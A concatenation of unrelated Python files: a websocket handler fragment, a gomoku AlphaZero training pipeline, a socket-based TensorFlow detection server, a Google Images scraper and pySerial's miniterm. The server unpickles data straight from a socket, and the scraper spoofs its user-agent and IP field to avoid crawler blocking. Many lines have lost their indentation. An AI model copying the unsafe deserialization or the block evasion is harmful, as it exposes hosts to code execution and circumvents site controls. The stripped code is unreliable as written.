error_msg = json_wrapper.get_string_or_default(
'err-msg', 'Unknown error')
self.on_error(error_code + ': ' + error_msg)
elif json_wrapper.contain_key('result') and json_wrapper.contain_key('id'):
self.__on_receive_response(json_wrapper)
else:
self.__on_receive_payload(json_wrapper)
def __on_receive_response(self, json_wrapper):
res = None
try:
res = json_wrapper.get_int('id')
except Exception as e:
            self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(
SubscribeMessageType.RESPONSE, res)
except Exception as e:
self.on_error('Process error: ' + str(e)
+ ' You should capture the exception in your error handler')
def __on_receive_payload(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
            self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(SubscribeMessageType.PAYLOAD, res)
except Exception as e:
self.on_error('Process error: ' + str(e)
+ ' You should capture the exception in your error handler')
if self.request.auto_close:
self.close()
def __process_ping_on_trading_line(self, ping_ts):
        self.send('{"op":"pong","ts":' + str(ping_ts) + '}')
return
def __process_ping_on_market_line(self, ping_ts):
        self.send('{"pong":' + str(ping_ts) + '}')
return
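    # Illustrative note (assumes the server expects JSON payloads): the two ping
    # handlers above answer with frames such as {"op":"pong","ts":1630000000000}
    # on the trading line and {"pong":1630000000000} on the market line.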
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error(
'[Sub][' + str(self.id) + '] Connection is closing due to error')
|
train_multi_2.0.py
|
#!/search/odin/liyaozong/tools/python3/bin/python3
# coding: utf8
import random
import numpy as np
from collections import defaultdict, deque
from game import Board, Game
from mcts_pure import MCTSPlayer as MCTS_Pure
from mcts_alphaZero import MCTSPlayer
import multiprocessing
from multiprocessing import Manager, Pool
import time
import logging
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
model_dir='multi_2'
log_name = model_dir + '/logs'
current_model_name = model_dir + '/current_policy_model'
temp_current_model_name = model_dir + '/temp_current_policy_model'
best_model_name = model_dir + '/best_policy_model'
# logging configuration
logging.basicConfig(filename=log_name, level=logging.INFO, format="[%(levelname)s]\t%(asctime)s\tLINENO:%(lineno)d\t%(message)s", datefmt="%Y-%m-%d %H:%M:%S")
class TrainPipeline():
def __init__(self, init_model=None):
# params of the board and the game
self.board_width = 8
self.board_height = 8
self.n_in_row = 5
# training params
self.learn_rate = 2e-3
self.temp = 1.0 # the temperature param
self.n_playout = 400 # num of simulations for each move
self.c_puct = 5
self.batch_size = 512 # mini-batch size for training
self.buffer_num = self.batch_size * 100
self.play_batch_size = 1
self.epochs = 5 # num of train_steps for each update
self.kl_targ = 0.02
self.check_freq = 1000
self.update_freq = 300
self.game_batch_num = 1000000000
self.process_num = 12
self.summary_record_freq = 5
        # seconds the main process sleeps to let the worker processes start up
        self.main_process_wait_time = 300
def collect_selfplay_data_thread(self, thread_id, shared_queue, net_lock, data_lock):
os.environ["CUDA_VISIBLE_DEVICES"] = str(thread_id % 6 + 2)
def local_thread_func(thread_id, shared_queue, net_lock, data_lock):
from policy_value_net_tensorflow import PolicyValueNet
            # load the model file while holding the net lock
logging.info("selfplay process {} ask net lock".format(thread_id))
with net_lock:
                logging.info('selfplay process {} get net lock'.format(thread_id))
current_policy = PolicyValueNet(self.board_width, self.board_height, model_file=current_model_name)
logging.info('selfplay process {} release net lock'.format(thread_id))
local_board = Board(width=self.board_width,
height=self.board_height,
n_in_row=self.n_in_row)
local_game = Game(local_board)
local_mcts_player = MCTSPlayer(current_policy.policy_value_fn,
c_puct=self.c_puct,
n_playout=self.n_playout,
is_selfplay=1)
logging.info("selfplay process {} start {}th selfplay".format(thread_id, index))
winner, play_data = local_game.start_self_play(local_mcts_player,
temp=self.temp)
logging.info("selfplay process {} finish {}th selfplay".format(thread_id, index))
play_data = list(play_data)
play_data = self.get_equi_data(play_data)
            # append the self-play data while holding the data lock
            logging.info('selfplay process {} ask data lock'.format(thread_id))
            with data_lock:
                logging.info('selfplay process {} get data lock'.format(thread_id))
shared_queue.extend(play_data)
while len(shared_queue) > self.buffer_num:
shared_queue.pop(0)
logging.info('selfplay process {} release data lock'.format(thread_id))
        logging.info('selfplay process {} all selfplay started'.format(thread_id))
for index in range(self.game_batch_num):
pro = multiprocessing.Process(target=local_thread_func, args=(thread_id, shared_queue, net_lock, data_lock))
pro.start()
pro.join()
        logging.info('selfplay process {} all selfplay finished'.format(thread_id))
def get_equi_data(self, play_data):
"""augment the data set by rotation and flipping
play_data: [(state, mcts_prob, winner_z), ..., ...]
"""
extend_data = []
        for state, mcts_prob, winner in play_data:
            for i in [1, 2, 3, 4]:
                # rotate counterclockwise
                equi_state = np.array([np.rot90(s, i) for s in state])
                equi_mcts_prob = np.rot90(np.flipud(
                    mcts_prob.reshape(self.board_height, self.board_width)), i)
extend_data.append((equi_state,
np.flipud(equi_mcts_prob).flatten(),
winner))
# flip horizontally
equi_state = np.array([np.fliplr(s) for s in equi_state])
equi_mcts_prob = np.fliplr(equi_mcts_prob)
extend_data.append((equi_state,
np.flipud(equi_mcts_prob).flatten(),
winner))
return extend_data
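    # Illustrative check (a sketch, not part of the original training code): each
    # (state, prob, winner) triple expands to 8 equivalent samples, 4 rotations
    # x 2 horizontal flips. For the 8x8 board used here:
    #   state = np.zeros((4, 8, 8)); prob = np.zeros(64)
    #   assert len(TrainPipeline().get_equi_data([(state, prob, 1)])) == 8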
def policy_update(self, current_policy_value_net, shared_queue, net_lock, data_lock, index, lr_multiplier):
"""update the policy-value net"""
with data_lock:
random_index = list(range(len(shared_queue)))
random.shuffle(random_index)
mini_batch = []
for i in range(self.batch_size):
mini_batch.append(shared_queue[random_index[i]])
state_batch = [data[0] for data in mini_batch]
mcts_probs_batch = [data[1] for data in mini_batch]
winner_batch = [data[2] for data in mini_batch]
old_probs, old_v = current_policy_value_net.policy_value(state_batch)
for i in range(self.epochs):
loss, entropy = current_policy_value_net.train_step(
state_batch,
mcts_probs_batch,
winner_batch,
self.learn_rate * lr_multiplier)
new_probs, new_v = current_policy_value_net.policy_value(state_batch)
kl = np.mean(np.sum(old_probs * (
np.log(old_probs + 1e-10) - np.log(new_probs + 1e-10)),
axis=1)
)
if kl > self.kl_targ * 4: # early stopping if D_KL diverges badly
break
# adaptively adjust the learning rate
if kl > self.kl_targ * 2 and lr_multiplier > 0.1:
lr_multiplier /= 1.5
elif kl < self.kl_targ / 2 and lr_multiplier < 10:
lr_multiplier *= 1.5
explained_var_old = (1 -
np.var(np.array(winner_batch) - old_v.flatten()) /
np.var(np.array(winner_batch)))
explained_var_new = (1 -
np.var(np.array(winner_batch) - new_v.flatten()) /
np.var(np.array(winner_batch)))
logging.info("update process kl:{:.5f},lr_multiplier:{:.3f},loss:{},entropy:{},explained_var_old:{:.3f},explained_var_new:{:.3f}".format(
kl,
lr_multiplier,
loss,
entropy,
explained_var_old,
explained_var_new))
# summary for tensorboard
if index % self.summary_record_freq == 0:
current_policy_value_net.summary_record(
state_batch,
mcts_probs_batch,
winner_batch,
index,
)
return lr_multiplier
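    # Illustrative note (derived from kl_targ = 0.02 above): an epoch whose
    # measured KL exceeds 0.08 (4 * kl_targ) stops the update early; KL above
    # 0.04 shrinks the step (lr_multiplier /= 1.5) and KL below 0.01 grows it
    # (lr_multiplier *= 1.5), keeping D_KL close to the target.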
def update_net_thread(self, shared_queue, net_lock, data_lock, stop_update_process, update_best_model):
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
from policy_value_net_tensorflow import PolicyValueNet
logging.info('update process start')
        # create the network, then save the initial current and best model files
current_policy_value_net = PolicyValueNet(self.board_width, self.board_height, model_dir)
current_policy_value_net.save_model(current_model_name)
current_policy_value_net.save_model(best_model_name)
best_win_ratio = 0
get_enough_train_data = False
global_update_step = 0
lr_multiplier = 1.0
while stop_update_process.value == 0:
time.sleep(1)
if get_enough_train_data:
global_update_step += 1
logging.info('update process start {} th self train'.format(global_update_step))
lr_multiplier = self.policy_update(current_policy_value_net, shared_queue, net_lock, data_lock, global_update_step, lr_multiplier)
logging.info('update process end {} th self train'.format(global_update_step))
                # save the latest model file here
logging.info('update process ask net lock')
with net_lock:
logging.info('update process get net lock')
current_policy_value_net.save_model(current_model_name)
logging.info('update process release net lock')
if (global_update_step + 1) % self.update_freq == 0:
update_best_model.value = 1
else:
with data_lock:
get_enough_train_data = len(shared_queue) >= self.batch_size
logging.info('update process finished')
def update_best_model_thread(self, current_model_name, best_model_name, net_lock, update_best_model, stop_update_process):
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
def update_best_model_local_process_func(name1, name2):
from policy_value_net_tensorflow import PolicyValueNet
PolicyValueNet(self.board_width, self.board_height, model_file=name1).save_model(name2)
update_best_model_global_num = 0
update_best_model_time = 0
logging.info('update best model process start!')
while stop_update_process.value == 0:
if update_best_model.value == 1:
update_best_model_global_num += 1
logging.info('update best model process global_num:{}'.format(update_best_model_global_num))
win_num = 0
start_player = 0
with net_lock:
p = multiprocessing.Process(target=update_best_model_local_process_func, args=(current_model_name, temp_current_model_name))
p.start()
p.join()
for i in range(20):
board = Board(width=self.board_width, height=self.board_height, n_in_row=self.n_in_row)
game = Game(board)
logging.info('update best model process start {} th local game, first move player {}'.format(i, start_player))
win_player = game.two_net_play(temp_current_model_name, best_model_name, net_lock, start_player=start_player, is_shown=1)
logging.info('update best model process {} th local game finished, win player is {}'.format(i, win_player))
start_player = 1 - start_player # play first in turn
if win_player == 0:
win_num += 1
logging.info('update best model process global_num:{} finished, current model win total {}'.format(update_best_model_global_num, win_num))
if win_num >= 11:
update_best_model_time += 1
logging.info('update best model process get new best model:{}'.format(update_best_model_time))
p = multiprocessing.Process(target=update_best_model_local_process_func, args=(temp_current_model_name, best_model_name))
p.start()
p.join()
update_best_model.value = 0
def run(self):
"""run the training pipeline"""
try:
            # tensorflow must be imported inside a single worker process, otherwise the
            # other processes block with:
            # ERROR: could not retrieve CUDA device count: CUDA_ERROR_NOT_INITIALIZED
m = Manager()
shared_queue = m.list()
net_lock = m.Lock()
data_lock = m.Lock()
stop_update_process = multiprocessing.Value('i', 0)
update_best_model = multiprocessing.Value('i', 0)
update_process = multiprocessing.Process(target=self.update_net_thread,
args=(shared_queue, net_lock, data_lock, stop_update_process, update_best_model))
update_process.start()
time.sleep(5)
pro_list = []
for i in range(self.process_num):
pro = multiprocessing.Process(target=self.collect_selfplay_data_thread, args=(i, shared_queue, net_lock, data_lock))
pro_list.append(pro)
pro.start()
time.sleep(1)
update_best_model_process = multiprocessing.Process(target=self.update_best_model_thread,
args=(current_model_name, best_model_name, net_lock, update_best_model, stop_update_process))
update_best_model_process.start()
            # give the worker processes time to finish starting up
time.sleep(self.main_process_wait_time)
            while update_process.is_alive():
                # re-evaluate on every pass; setting this flag only once would make it sticky
                all_finished = True
                for pro in pro_list:
                    if pro.is_alive():
                        all_finished = False
                        break
                if all_finished:
                    stop_update_process.value = 1
                time.sleep(300)
        except Exception as e:
            logging.exception('training pipeline quit with error: {}'.format(e))
if __name__ == '__main__':
training_pipeline = TrainPipeline()
logging.info('start training')
training_pipeline.run()
logging.info('all finished')
|
TfServer.py
|
import time
from threading import Thread, Event
import socket
import cv2
import pickle
import struct
from detection import Obj_Detection
"""
COPYRIGHT @ Grebtsew 2019
TfServer receives a couple of connections, reads images from incoming streams
and sends detections to the QtServer
"""
QtServer_address= [["127.0.0.1",8081]]
class TfServer(Thread):
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 8585 # Port to listen on (non-privileged ports are > 1023)
def __init__(self):
super(TfServer, self).__init__()
print("Tensorflow Server started at ", self.HOST, self.PORT)
# Start detections
self.tf_thread = Obj_Detection()
# Setup output socket
print("Tensorflow Server try connecting to Qt Server ", QtServer_address[0][0],QtServer_address[0][1])
self.outSocket = socket.socket()
self.outSocket.connect((QtServer_address[0][0],QtServer_address[0][1]))
print("SUCCESS : Tensorflow Server successfully connected to Qt Server!", )
def handle_connection(self, conn):
with conn:
data = b""
payload_size = struct.calcsize(">L")
while True:
                # Receive image package size
while len(data) < payload_size:
#print("Recv: {}".format(len(data)))
data += conn.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
#print("msg_size: {}".format(msg_size))
                # Receive image
while len(data) < msg_size:
data += conn.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
# Decode image
frame=pickle.loads(frame_data, fix_imports=True, encoding="bytes")
frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
                # run detections
self.tf_thread.frame = frame
self.tf_thread.run_async()
detect_res = self.tf_thread.get_result()
# send detection result to QtServer
if detect_res is not None:
self.send(detect_res)
def send(self, data):
self.outSocket.sendall(pickle.dumps(data))
def run(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as inSocket:
inSocket.bind((self.HOST, self.PORT))
inSocket.listen()
while True:
conn, addr = inSocket.accept()
Thread(target=self.handle_connection, args=(conn,)).start()
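# Illustrative client sketch (assumed peer, not part of this file): a sender
# must frame each JPEG-encoded image with the 4-byte big-endian length prefix
# that handle_connection above parses via struct.calcsize(">L"):
#   import cv2, pickle, socket, struct
#   sock = socket.socket(); sock.connect(('127.0.0.1', 8585))
#   ok, enc = cv2.imencode('.jpg', frame)   # 'frame' is a BGR numpy image
#   payload = pickle.dumps(enc)
#   sock.sendall(struct.pack('>L', len(payload)) + payload)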
if __name__ == '__main__':
    tfserver = TfServer()
    tfserver.start()
|
googleimages_dsk.py
|
"""Google Image Downloader
Original written by Neeraj Kumar <me@neerajkumar.org>
DO NOT DISTRIBUTE!
"""
from PIL import Image
import os, sys, time
import urllib
import random
from Queue import Queue
# GLOBALS
# queues for managing downloads
dlq = Queue()
outq = Queue()
# number of simultaneous download threads
NDLTHREADS = 16
# the API requires you to set these variables:
REFERRER = 'http://cnet.com/'
#USERIP = '24.18.226.243'
USERIP = '24.18.226.' + str(random.randint(100, 250))
class CustomURLopener(urllib.FancyURLopener):
"""Custom url opener that defines a new user-agent.
Needed so that sites don't block us as a crawler."""
version = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
    def prompt_user_passwd(self, host, realm):
"""Custom user-password func for downloading, to make sure that we don't block"""
return ('', '')
urllib._urlopener = CustomURLopener()
def spawnWorkers(num, target, name=None, args=(), kwargs={}, daemon=1, interval=0):
"""Spawns the given number of workers, by default daemon, and returns a list of them.
'interval' determines the time delay between each launching"""
from threading import Thread
threads = []
for i in range(num):
t = Thread(target=target, name=name, args=args, kwargs=kwargs)
t.setDaemon(daemon)
t.start()
threads.append(t)
time.sleep(interval)
return threads
def dlthread(dlq=dlq, outq=outq):
"""An infinite loop which downloads images from dlq.
Each item in dlq should be a (url, fname, callback).
Downloads to fname, creating parent dirs.
Once it's downloaded, puts (url, fname) on outq.
On error, puts (url, None) on outq.
If callback is not None, then calls it with (url, fname).
"""
from urllib import urlretrieve
while 1:
u, f, callback = dlq.get()
if not u: break
try:
os.makedirs(os.path.dirname(f))
except OSError: pass
try:
fname, junk = urlretrieve(u, f)
except Exception, e:
print >>sys.stderr, 'Exception on %s -> %s: %s' % (u, f, e)
fname = None
outq.put((u,fname))
if callback:
callback(u, fname)
# spawn the download threads
dlthreads = spawnWorkers(NDLTHREADS, dlthread, interval=0)
class GoogleImages(object):
"""A google images searcher"""
def __init__(self, outdir='/projects/grail/santosh/objectNgrams/results/ngramPruning/horse/images/', **dlkw):
"""Initializes with simple setup.
Also accepts kwargs, which will be used when constructing the url.
See https://developers.google.com/image-search/v1/jsondevguide for details.
By default, the following args are set:
imgc=color|gray
imgsz='small|medium|large|xlarge|xxlarge|huge' (notice that 'icon' is missing)
imgtype='photo' (other options: face, clipart, lineart, None (for all)
"""
self.outdir = outdir
self.dlkw = dict(imgsz='small|medium|large|xlarge|xxlarge|huge', imgtype='photo',imgc='color')
self.dlkw.update(dlkw)
def _dl(self, q, downdir, urlstring, callback=None, limit=0, delay=0.01):
"""Main internal download function.
Given a search term as 'q', downloads images to our outdir.
Returns (allret, urls, fnames), where:
allret is a list of result dicts from google images
urls is a list of thumbnail urls
fnames is a list of downloaded image paths
Note that the output images are at self.outdir/q/imageid.jpg
If you pass a callback, it's called for each individual image downloaded:
callback(idx, result obj, path)
where:
'idx' is the index of the downloaded image (not necessarily in order),
'result obj' is the object returned by the google API, and
'path' is the path to the downloaded image
You can optionally pass a limit >0 to limit results to that many.
The delay is used to busy-wait-sleep at the end, waiting for all images to download
urlstring can be 'tbUrl' or 'url'
"""
import urllib2
from urllib import quote_plus
try:
import simplejson as json
except ImportError:
import json
todo = {}
ret = []
"""dir = os.path.join(downdir, q)"""
dir = downdir
def wrapped_callback(url, fname, todo=todo, ret=ret, callback=callback):
"""Wrap the user callback here.
Also do other bookkeeping."""
r = todo.get(url, None)
if r and fname:
ret.append((r, url, fname))
if callback:
callback(len(ret)-1, r, fname)
todo.pop(url, None)
# iterate through different pages (can't get more than 8 per page)
        # google only supports up to 64 results
#TODO see if we can simultaneously make all requests, or if that speeds things up
t1 = time.time()
for start in [0, 8, 16, 24, 32, 40, 48, 56]:
# note that we exclude very small image sizes
d = dict(userip=USERIP, q=quote_plus(q), start=start)
url = 'https://ajax.googleapis.com/ajax/services/search/images?v=1.0&q=%(q)s&userip=%(userip)s&rsz=8&start=%(start)d' % (d)
# also add our dlkw
url += ''.join(['&%s=%s' % (k, v) for k, v in self.dlkw.iteritems() if v])
request = urllib2.Request(url, None, {'Referer': REFERRER})
response = urllib2.urlopen(request)
results = json.load(response)['responseData']['results']
if not results: break
for r in results:
url = r[urlstring]
fname = os.path.join(dir, '%s.jpg' % r['imageId'])
todo[url] = r
dlq.put((url, fname, wrapped_callback))
if limit > 0 and len(ret) >= limit: break
# wait until all todo are done
while 1:
if not todo: break
if limit > 0 and len(ret) >= limit: break
time.sleep(delay)
if ret:
if limit > 0:
ret = ret[:limit]
return zip(*ret)
return ([], [], [])
def getthumbs(self, term, downdir, urlstring, callback=None, limit=0):
"""Downloads all thumbnails for the given term (if needed).
Checks for a json file in the appropriate location first.
If you pass a callback, it's called for each individual image downloaded:
callback(idx, result obj, path)
where:
'idx' is the index of the downloaded image (not necessarily in order),
'result obj' is the object returned by the google API, and
'path' is the path to the downloaded image
You can optionally pass a limit >0 to limit results to that many.
Returns a list of valid image filenames.
"""
try:
import simplejson as json
except ImportError:
import json
"""dir = os.path.join(downdir, term)"""
dir = downdir
jsonfname = os.path.join(dir, 'index.json')
try:
results = json.load(open(jsonfname))
# we still need to call the callbacks
if callback:
for i, (r, im) in enumerate(zip(results['results'], results['thumbfnames'])):
if limit > 0 and i >= limit: break
callback(i, r, im)
except Exception:
# we don't have valid results, so re-download
ret, urls, fnames = self._dl(term, downdir, urlstring, callback=callback, limit=limit)
results = dict(results=ret, thumburls=urls, thumbfnames=fnames)
try:
os.makedirs(os.path.dirname(jsonfname))
except OSError: pass
json.dump(results, open(jsonfname, 'w'), indent=2)
# at this point, we have results one way or the other
return results['thumbfnames'][:limit] if limit > 0 else results['thumbfnames']
def testgoog():
"""Tests the google image downloader"""
G = GoogleImages()
start = time.time()
downdir = sys.argv[1]
urlstring = sys.argv[2]
for term in sys.argv[3:]:
done = 0
attempt = 0
while not done:
attempt += 1
# next three lines added by dsk
if attempt > 10:
print 'Too many attempts, so quitting'
break
try:
t1 = time.time()
print 'Attempt #%d to download images for term "%s" (%0.3fs elapsed since start)' % (attempt, term, t1-start)
def callback(idx, obj, fname):
"""Simple callback that prints info"""
print ' For term "%s" got image #%d in %0.3fs: %s' % (term, idx+1, time.time()-t1, fname)
ret = G.getthumbs(term, downdir, urlstring, callback=callback)
print 'Downloaded %d images in %0.3f secs for query "%s"\n' % (len(ret), time.time()-t1, term)
done = 1
except Exception, e:
print 'Caught exception %s, so sleeping for a bit' % (e,)
time.sleep(10)
time.sleep(0.1)
if __name__ == '__main__':
testgoog()
|
miniterm.py
|
#!C:\MicroPythonProjects\ch3\pyboard_1_1\venv\Scripts\python.exe
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
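# Illustrative examples (not part of the original): key_description('\x03')
# returns 'Ctrl+C' and key_description('a') returns "'a'".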
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
                elif z in (unichr(0), unichr(0xe0)):  # function-key prefixes, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
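            # (0x100 is WM_KEYDOWN and 0x0d is VK_RETURN, i.e. fake an ENTER key)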
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
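    # 0x2400 is the start of the Unicode "Control Pictures" block, which has a
    # visible glyph (e.g. U+2400 for NUL) for each otherwise invisible code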
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
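# Illustrative sketch, not part of upstream pySerial: the "add date/time for
# each newline" idea above could be implemented as one more Transform and
# registered under a name of your choosing, e.g.
#     TRANSFORMATIONS['timestamp'] = Timestamp
import datetime

class Timestamp(Transform):
    """Stamp the wall-clock time at the start of each received line (example)"""
    def rx(self, text):
        stamp = datetime.datetime.now().strftime('%H:%M:%S.%f ')
        return text.replace('\n', '\n' + stamp)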
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
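        # rx applies the same transformations in reverse order, so the receive
        # side mirrors (undoes) the transmit pipeline symmetrically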
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
